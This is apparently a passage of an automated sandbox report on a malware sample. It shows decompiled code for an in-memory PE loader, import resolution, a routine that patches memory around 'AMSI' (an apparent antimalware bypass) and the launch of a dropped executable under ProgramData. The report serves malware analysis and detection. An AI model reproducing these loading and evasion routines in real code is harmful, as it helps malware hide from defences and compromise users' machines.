    					_v12 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)), _v24, 0x1000, 4); // SizeOfRawData == 0: commit SectionAlignment (_a12 + 0x38) bytes and zero them, as for a .bss-style section
    					if(_v12 != 0) {
    						_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
    						 *((intOrPtr*)(_v8 + 8)) = _v12;
    						E011A1080(_v12, 0, _v24);
    						_t127 = _t127 + 0xc;
    						goto L8;
    					}
    					return 0;
    				}
    				return 1;
    			}

    Instruction addresses (one per decompiled line above): 0x011a12a6 .. 0x011a13de

    APIs
    • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 011A1321
    • VirtualAlloc.KERNELBASE(?,?,00001000,00000004,00000000,?,?,011A1E5E), ref: 011A139C
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: f403eec8e64fd5a9d6e8bcfaf7562f6cf746d05c4589a71bc5c95965248666aa
    • Instruction ID: 2627906a1f409949ab546ff65fc893464a7a4baea137e0a448b6e6998dfb02cf
    • Opcode Fuzzy Hash: f403eec8e64fd5a9d6e8bcfaf7562f6cf746d05c4589a71bc5c95965248666aa
    • Instruction Fuzzy Hash: 1F51CB78A04209EFCB08CF94C580AAEBBB1FF48314F608599E905A7345D370EE81CB95
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 446 11a190d-11a1924 IsBadReadPtr 448 11a192a-11a1931 446->448 449 11a1ae3-11a1ae9 446->449 448->449 451 11a1937-11a194e call 11a1af0 448->451 452 11a1950-11a195a 451->452 453 11a195c-11a196b SetLastError 452->453 454 11a1970-11a1985 call 11a1170 452->454 453->449 456 11a198a-11a1994 454->456 457 11a19c0-11a19f0 456->457 458 11a1996-11a19bb SetLastError 456->458 459 11a1a0b-11a1a20 457->459 460 11a19f2-11a1a09 457->460 458->449 462 11a1a23 459->462 460->462 463 11a1a37-11a1a3d 462->463 464 11a1ab8-11a1abc 463->464 465 11a1a3f-11a1a4a 463->465 466 11a1ade 464->466 467 11a1abe-11a1adc SetLastError 464->467 468 11a1a4c-11a1a73 465->468 469 11a1a75-11a1aa0 465->469 466->449 467->449 473 11a1aa2-11a1aa8 468->473 469->473 474 11a1aaa-11a1ab1 473->474 475 11a1ab3 473->475 474->464 475->463
    C-Code - Quality: 37%
    			E011A190D() {
    				intOrPtr _t95;
    				intOrPtr _t99;
    				intOrPtr _t102;
    				intOrPtr _t118;
    				intOrPtr _t123;
    				void* _t179;
    				void* _t181;
    				void* _t183;
    				void* _t184;
    
    				L0:
    				while(1) {
    					L0:
    					 *(_t179 - 4) =  *(_t179 - 4) + 0x14;
    					if(IsBadReadPtr( *(_t179 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t179 - 4) + 0xc)) == 0) {
    						break;
    					}
    					L3:
    					_t7 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    					_t12 =  *((intOrPtr*)(_t179 + 8)) + 0x1c; // 0x0, executed
    					_t99 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0xc)),  *_t7); // executed
    					_t183 = _t181 + 8;
    					 *((intOrPtr*)(_t179 - 0x14)) = _t99;
    					if( *((intOrPtr*)(_t179 - 0x14)) != 0) {
    						L5:
    						_t17 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    						_t21 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
    						_t102 = E011A1170( *_t21, 4 +  *_t17 * 4); // executed
    						_t184 = _t183 + 8;
    						 *((intOrPtr*)(_t179 - 0x20)) = _t102;
    						if( *((intOrPtr*)(_t179 - 0x20)) != 0) {
    							L7:
    							 *((intOrPtr*)( *((intOrPtr*)(_t179 + 8)) + 8)) =  *((intOrPtr*)(_t179 - 0x20));
    							_t34 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    							_t36 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
    							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t179 - 0x14));
    							_t41 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
    							 *( *((intOrPtr*)(_t179 + 8)) + 0xc) =  *_t41 + 1;
    							if( *( *(_t179 - 4)) == 0) {
    								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
    								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
    							} else {
    								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 4));
    								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
    							}
    							L12:
    							while( *( *(_t179 - 8)) != 0) {
    								if(( *( *(_t179 - 8)) & 0x80000000) == 0) {
    									 *((intOrPtr*)(_t179 - 0x24)) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 8));
    									_t77 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    									_t81 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
    									_t118 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t179 - 0x14)),  *((intOrPtr*)(_t179 - 0x24)) + 2,  *_t77);
    									_t184 = _t184 + 0xc;
    									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t118;
    								} else {
    									_t67 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    									_t71 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
    									_t123 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t179 - 0x14)),  *( *(_t179 - 8)) & 0x0000ffff,  *_t67);
    									_t184 = _t184 + 0xc;
    									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t123;
    								}
    								L16:
    								if( *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) != 0) {
    									L18:
    									L11:
    									 *(_t179 - 8) =  &(( *(_t179 - 8))[1]);
    									 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0x10)) + 4;
    									continue;
    								} else {
    									L17:
    									 *((intOrPtr*)(_t179 - 0x18)) = 0;
    								}
    								break;
    							}
    							L19:
    							if( *((intOrPtr*)(_t179 - 0x18)) != 0) {
    								L21:
    								continue;
    							} else {
    								L20:
    								_t87 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    								_t90 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
    								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t179 - 0x14)),  *_t87);
    								SetLastError(0x7f);
    							}
    						} else {
    							L6:
    							_t25 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
    							_t28 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
    							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t179 - 0x14)),  *_t25);
    							SetLastError(0xe);
    							 *((intOrPtr*)(_t179 - 0x18)) = 0;
    						}
    					} else {
    						L4:
    						SetLastError(0x7e);
    						 *((intOrPtr*)(_t179 - 0x18)) = 0;
    					}
    					break;
    				}
    				L22:
    				_t95 =  *((intOrPtr*)(_t179 - 0x18));
    				return _t95;
    			}

    0x011a190d
    0x011a190d
    0x011a190d
    0x011a1913
    0x011a1924
    0x00000000
    0x00000000
    0x011a1937
    0x011a193a
    0x011a194b
    0x011a194e
    0x011a1950
    0x011a1953
    0x011a195a
    0x011a1970
    0x011a1973
    0x011a1981
    0x011a1985
    0x011a198a
    0x011a198d
    0x011a1994
    0x011a19c0
    0x011a19c6
    0x011a19cc
    0x011a19d2
    0x011a19d8
    0x011a19de
    0x011a19e7
    0x011a19f0
    0x011a1a14
    0x011a1a20
    0x011a19f2
    0x011a19fa
    0x011a1a06
    0x011a1a06
    0x00000000
    0x011a1a37
    0x011a1a4a
    0x011a1a7d
    0x011a1a83
    0x011a1a95
    0x011a1a98
    0x011a1a9a
    0x011a1aa0
    0x011a1a4c
    0x011a1a4f
    0x011a1a66
    0x011a1a69
    0x011a1a6b
    0x011a1a71
    0x011a1a71
    0x011a1aa2
    0x011a1aa8
    0x011a1ab3
    0x011a1a25
    0x011a1a2b
    0x011a1a34
    0x00000000
    0x011a1aaa
    0x011a1aaa
    0x011a1aaa
    0x011a1aaa
    0x00000000
    0x011a1aa8
    0x011a1ab8
    0x011a1abc
    0x011a1ade
    0x00000000
    0x011a1abe
    0x011a1abe
    0x011a1ac1
    0x011a1acc
    0x011a1acf
    0x011a1ad6
    0x011a1ad6
    0x011a1996
    0x011a1996
    0x011a1999
    0x011a19a4
    0x011a19a7
    0x011a19ae
    0x011a19b4
    0x011a19b4
    0x011a195c
    0x011a195c
    0x011a195e
    0x011a1964
    0x011a1964
    0x00000000
    0x011a195a
    0x011a1ae3
    0x011a1ae3
    0x011a1ae9

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 011A191C
    • SetLastError.KERNEL32(0000007E), ref: 011A195E
    • SetLastError.KERNEL32(0000000E), ref: 011A19AE
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$Read
    • String ID:
    • API String ID: 1935436914-0
    • Opcode ID: 6a53964c82bccadc7b74fdd14368c65bed11f1ba01782cb377bc4889e4e1868b
    • Instruction ID: 029f582e3a14b93e376b81ea335e854d6eef6ccec4ba1895468162e1546707d2
    • Opcode Fuzzy Hash: 6a53964c82bccadc7b74fdd14368c65bed11f1ba01782cb377bc4889e4e1868b
    • Instruction Fuzzy Hash: EC011D74A00208EFDB18CF94C545BAEBBB1FF44314F648158E905AB281C774DE80DB95
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 478 1191d10-1191d1d 479 1191d29-1191d35 478->479 480 1191d1f-1191d24 478->480 482 1191d9d-1191da9 479->482 483 1191d37-1191d42 479->483 481 1191e71-1191e74 480->481 486 1191dab-1191db2 482->486 487 1191db4 482->487 484 1191d93-1191d98 483->484 485 1191d44-1191d4b 483->485 484->481 488 1191d4d-1191d5b 485->488 489 1191d6f-1191d8e call 1191820 485->489 490 1191dbb-1191dcd 486->490 487->490 488->489 493 1191d5d-1191d6d 488->493 495 1191d90 489->495 491 1191dd8 490->491 492 1191dcf-1191dd6 490->492 494 1191ddf-1191df1 491->494 492->494 493->484 493->489 496 1191dfc 494->496 497 1191df3-1191dfa 494->497 495->484 498 1191e03-1191e2e 496->498 497->498 499 1191e3c-1191e59 VirtualProtect 498->499 500 1191e30-1191e39 498->500 501 1191e5b-1191e6a call 1191b20 499->501 502 1191e6c 499->502 500->499 501->481 502->481
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f61caf7e76d8d05a3f4a5300af70d01faf4a0b27ad894de6c0403e09aca9458f
    • Instruction ID: 97161bf438e20c25ddd482d5648729955bc9bd6e6a55219b1e414c1c2e0f1c23
    • Opcode Fuzzy Hash: f61caf7e76d8d05a3f4a5300af70d01faf4a0b27ad894de6c0403e09aca9458f
    • Instruction Fuzzy Hash: EE41CA74A00109AFEB09DF48C494BAEB7B2FB88324F14C559E9295F355C775EA82CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 506 11a1af0-11a1b05 LoadLibraryA 507 11a1b0b 506->507 508 11a1b07-11a1b09 506->508 509 11a1b0e-11a1b11 507->509 508->509
    C-Code - Quality: 100%
    			E011A1AF0(void* __ecx, CHAR* _a4) {
    				struct HINSTANCE__* _v8;
    				struct HINSTANCE__* _t6;
    
    				_t6 = LoadLibraryA(_a4); // executed
    				_v8 = _t6;
    				if(_v8 != 0) {
    					return _v8;
    				}
    				return 0;
    			}

    0x011a1af8
    0x011a1afe
    0x011a1b05
    0x00000000
    0x011a1b0b
    0x00000000

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 011A1AF8
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 679c9a96f3d01741ba3ebbaf6e4025e178be5c83910cbde4d3330e53e7c11d76
    • Instruction ID: c9b11e111a3e81f0828c55445e76c55a93c59c89b547f4447c525b341864c8d4
    • Opcode Fuzzy Hash: 679c9a96f3d01741ba3ebbaf6e4025e178be5c83910cbde4d3330e53e7c11d76
    • Instruction Fuzzy Hash: 73D09E7891520CFBCB14DEA4D648659BBB8E708261F504594E80993204E6319A809A91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualAlloc.KERNELBASE(00000000,01191A51,00003000,00000004,000000BE,?,01191A51,?), ref: 01191A01
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 7633e0b11875ad5d9d2df7cc0010fd67d10b4eb24327e3986778f7d27c9c9e51
    • Instruction ID: 4fd525a886778c85d3a7cf1853bc9729b520255f810b3e593404ecbb3ee3ac9b
    • Opcode Fuzzy Hash: 7633e0b11875ad5d9d2df7cc0010fd67d10b4eb24327e3986778f7d27c9c9e51
    • Instruction Fuzzy Hash: 26D0C9B4645208BBE714CA94D846F69BBACE704611F004195FE189B280D5B1AE0057A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E011A1140(void* __ecx, long _a4) {
    				void* _v8;
    				void* _t5;
    
    				_t5 = VirtualAlloc(0, _a4, 0x3000, 4); // executed
    				_v8 = _t5;
    				return _v8;
    			}

    0x011a1151
    0x011a1157
    0x011a1160

    APIs
    • VirtualAlloc.KERNELBASE(00000000,011A11A1,00003000,00000004,00000004,?,011A11A1,?), ref: 011A1151
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 3fe5196feb6f0d953bb858480843c70bce040ba5e8b863552bd6fefa9bf6b174
    • Instruction ID: 9ce70d81ed5c668be03ddeb6cea70194006fdf53b0b0118a91aa25f1371df8e9
    • Opcode Fuzzy Hash: 3fe5196feb6f0d953bb858480843c70bce040ba5e8b863552bd6fefa9bf6b174
    • Instruction Fuzzy Hash: 37D0C974685208BBE714CA84D906F6ABBACE705621F000194FE089B280D5B16E404791
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 0119182F
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 62f9285bef2325c35d0dc24c126c83aad8196966beda75f00a1a33c3225fab14
    • Instruction ID: 0a58ee752a182983cfb2e292605dbe4e09d12b58adef5c6337f40b590c2acdb1
    • Opcode Fuzzy Hash: 62f9285bef2325c35d0dc24c126c83aad8196966beda75f00a1a33c3225fab14
    • Instruction Fuzzy Hash: D2C04C7611430CAB8B04DF98E884DAB37ADBB8C610B048518BA2D87204C630F9508BA4
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    APIs
    • SetLastError.KERNEL32(0000007F), ref: 011914DB
    • SetLastError.KERNEL32(0000007F), ref: 01191507
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 8c671ad3eae21bfc91b3cb7d8db54a713391db761be32aa3e5a718700843a6d8
    • Instruction ID: 9df4b697dabffaec33f06140dadb89ae984587a27d57077572bbf7271aa4032f
    • Opcode Fuzzy Hash: 8c671ad3eae21bfc91b3cb7d8db54a713391db761be32aa3e5a718700843a6d8
    • Instruction Fuzzy Hash: 3571F874E0410AEFDF08DF98C580AADB7B2FF48314F2585A9D426AB345D774EA81CB91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E033712B0() {
    				signed int _v8;
    				void _v40;
    				void* _v52;
    				void* _v56;
    				char _v124;
    				int _t23;
    				void* _t32;
    				void* _t37;
    				signed int _t40;
    
    				_v8 =  *0x3373004 ^ _t40;
    				 *0x3373028( &_v124, 0, 0x44, _t32, _t37);
    				 *0x3373028( &_v56, 0, 0x10);
    				_v124 = 0x44;
    				memcpy( &_v40, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
    				asm("movsw");
    				asm("movsb");
    				 *0x3373018( &_v40, 0, 0, 0, 0, 0, 0, "C:\\",  &_v124,  &_v56);
    				CloseHandle(_v56);
    				_t23 = CloseHandle(_v52);
    				E03371A04();
    				return _t23;
    			}

    0x033712bd
    0x033712ca
    0x033712db
    0x033712e4
    0x033712f8
    0x033712fa
    0x033712fc
    0x0337131a
    0x03371324
    0x0337132e
    0x0337133b
    0x03371343

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID: C:\$C:\ProgramData\huqvg\huqvg.exe$C:\ProgramData\huqvg\huqvg.exe$D
    • API String ID: 2962429428-1049507935
    • Opcode ID: a4e178ee757a2f70ef1c9caa7f7ffd2a301432a7184d3a01622f91254f3ae2df
    • Instruction ID: 745b257f61b8dc21c771f2c56a794413d85d38c2b5ccd4e89f3248e15bd08d1f
    • Opcode Fuzzy Hash: a4e178ee757a2f70ef1c9caa7f7ffd2a301432a7184d3a01622f91254f3ae2df
    • Instruction Fuzzy Hash: 57019675D0020CBBDB20EBA4D885FDE777CEB48714F100418FA06E7180D6796A08CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • LoadLibraryExA.KERNEL32(01194070,00000000,00000800), ref: 011925F9
    • GetProcAddress.KERNEL32(00000000,01194078), ref: 01192615
    • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 01192650
    • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 01192671
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual$AddressLibraryLoadProc
    • String ID: AMSI
    • API String ID: 3300690313-3828877684
    • Opcode ID: 0a1e017d85acd35c0a213467bb4b99a5810af9a10b66434bdda044c6f594fd33
    • Instruction ID: 6b9472d915c679446c7b4e3548a0c43313d5bd4fe87905d0f6acadcf213b6425
    • Opcode Fuzzy Hash: 0a1e017d85acd35c0a213467bb4b99a5810af9a10b66434bdda044c6f594fd33
    • Instruction Fuzzy Hash: 79111CB4E00209EFCF18CFA4C845BAEBBB4FB48304F104559EA21A7740D7B46A44CB95
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetProcAddress.KERNEL32(?), ref: 011544DA
    • GetProcAddress.KERNEL32(?), ref: 011544E4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1150000_rundll32.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: D$dll
    • API String ID: 190572456-2257804249
    • Opcode ID: d6a5440daa4b5954b40f572194cbb49577153b61c06ced8391ffe2c57ab3dd00
    • Instruction ID: f007086256638abddeb451a1a60bdff3b54dbf4b07678141c600e07904521921
    • Opcode Fuzzy Hash: d6a5440daa4b5954b40f572194cbb49577153b61c06ced8391ffe2c57ab3dd00
    • Instruction Fuzzy Hash: 32018071900218BBEB14EBA4CC99FDF7B7DEB48704F104018FB05A7185DB756A48CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E011A1FA0(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr* _v24;
    				signed short* _v28;
    				intOrPtr* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _t82;
    				void* _t124;
    
    				_v40 = __ecx;
    				_t3 = _a4 + 4; // 0x3
    				_v12 =  *_t3;
    				_v16 = 0;
    				_v32 =  *_a4 + 0x78;
    				if( *((intOrPtr*)(_v32 + 4)) != 0) {
    					_v8 = _v12 +  *_v32;
    					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
    						SetLastError(0x7f);
    						return 0;
    					} else {
    						if((_a8 >> 0x00000010 & 0xffff) != 0) {
    							_v24 = _v12 +  *((intOrPtr*)(_v8 + 0x20));
    							_v28 = _v12 +  *((intOrPtr*)(_v8 + 0x24));
    							_v36 = 0;
    							_v20 = 0;
    							while(_v20 <  *((intOrPtr*)(_v8 + 0x18))) {
    								_t82 = E011A11E0(_a8, _v12 +  *_v24);
    								_t124 = _t124 + 8;
    								if(_t82 != 0) {
    									_v20 = _v20 + 1;
    									_v24 = _v24 + 4;
    									_v28 =  &(_v28[1]);
    									continue;
    								}
    								_v16 =  *_v28 & 0x0000ffff;
    								_v36 = 1;
    								break;
    							}
    							if(_v36 != 0) {
    								L17:
    								if(_v16 <=  *((intOrPtr*)(_v8 + 0x14))) {
    									return _v12 +  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v8 + 0x1c)) + _v16 * 4));
    								}
    								SetLastError(0x7f);
    								return 0;
    							}
    							SetLastError(0x7f);
    							return 0;
    						}
    						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
    							_v16 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
    							goto L17;
    						}
    						SetLastError(0x7f);
    						return 0;
    					}
    				}
    				SetLastError(0x7f);
    				return 0;
    			}

    0x011a1fa6
    0x011a1fac
    0x011a1faf
    0x011a1fb2
    0x011a1fca
    0x011a1fd4
    0x011a1fed
    0x011a1ff7
    0x011a2004
    0x00000000
    0x011a2011
    0x011a2021
    0x011a2069
    0x011a2075
    0x011a2078
    0x011a207f
    0x011a20a3
    0x011a20bb
    0x011a20c0
    0x011a20c5
    0x011a208e
    0x011a2097
    0x011a20a0
    0x00000000
    0x011a20a0
    0x011a20cd
    0x011a20d0
    0x00000000
    0x011a20d0
    0x011a20df
    0x011a20ed
    0x011a20f6
    0x00000000
    0x011a2113
    0x011a20fa
    0x00000000
    0x011a2100
    0x011a20e3
    0x00000000
    0x011a20e9
    0x011a2035
    0x011a2058
    0x00000000
    0x011a2058
    0x011a2039
    0x00000000
    0x011a203f
    0x011a1ff7
    0x011a1fd8
    0x00000000

    APIs
    • SetLastError.KERNEL32(0000007F,?,?,?,?,011A1039,00000000), ref: 011A1FD8
    • SetLastError.KERNEL32(0000007F,?,?,?,?,011A1039,00000000), ref: 011A2004
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 6741611c03d16aed724bf62292b3ee609197003f0bc6652615da6ca554eba72b
    • Instruction ID: b03fb9f53368d53efd25a205f2353de15fcac0aab5effb489e41af65989d82a1
    • Opcode Fuzzy Hash: 6741611c03d16aed724bf62292b3ee609197003f0bc6652615da6ca554eba72b
    • Instruction Fuzzy Hash: 6B510A78A44209DFDB18CF98C581BAEBBB2FF48304F608169D515AB381D735EA81CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 011547F6: atoi.MSVCRT ref: 011548F0
      • Part of subcall function 011547F6: _initterm.MSVCRT ref: 01154905
    • DisableThreadLibraryCalls.KERNEL32(00003A98), ref: 0115431C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1150000_rundll32.jbxd
    Similarity
    • API ID: CallsDisableLibraryThread_inittermatoi
    • String ID: EL32.dll$dll
    • API String ID: 2582834166-3514254202
    • Opcode ID: 3677c87e7301b03a0ea7938c50ba3f2ac51d1810227c807ec84151f250858ddc
    • Instruction ID: 515b4ee2c2b815b99ef32150bd52cffd402948b6a128caea1f714444ffd3dcfe
    • Opcode Fuzzy Hash: 3677c87e7301b03a0ea7938c50ba3f2ac51d1810227c807ec84151f250858ddc
    • Instruction Fuzzy Hash: CD21D871E00118EBEB08DBE8CC95ADFBB79FF44304F144028E905AB244E775AA56C791
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 01192468
    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 011924B2
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID: @
    • API String ID: 544645111-2766056989
    • Opcode ID: 7f799b2d57aad6568a717478484aebfc33a01759fd265d7bdc1f4fde80dd93f2
    • Instruction ID: f6450f969693f3d4302ed4300911c14711678e9393437e9f1e3b694b26e3c691
    • Opcode Fuzzy Hash: 7f799b2d57aad6568a717478484aebfc33a01759fd265d7bdc1f4fde80dd93f2
    • Instruction Fuzzy Hash: B521E8B4A04209FFDF18CF98C980BADBBB5BF44304F248199D925AB245C774AB80DB55
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:41%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0%
    Total number of Nodes:282
    Total number of Limit Nodes:17

    Graph

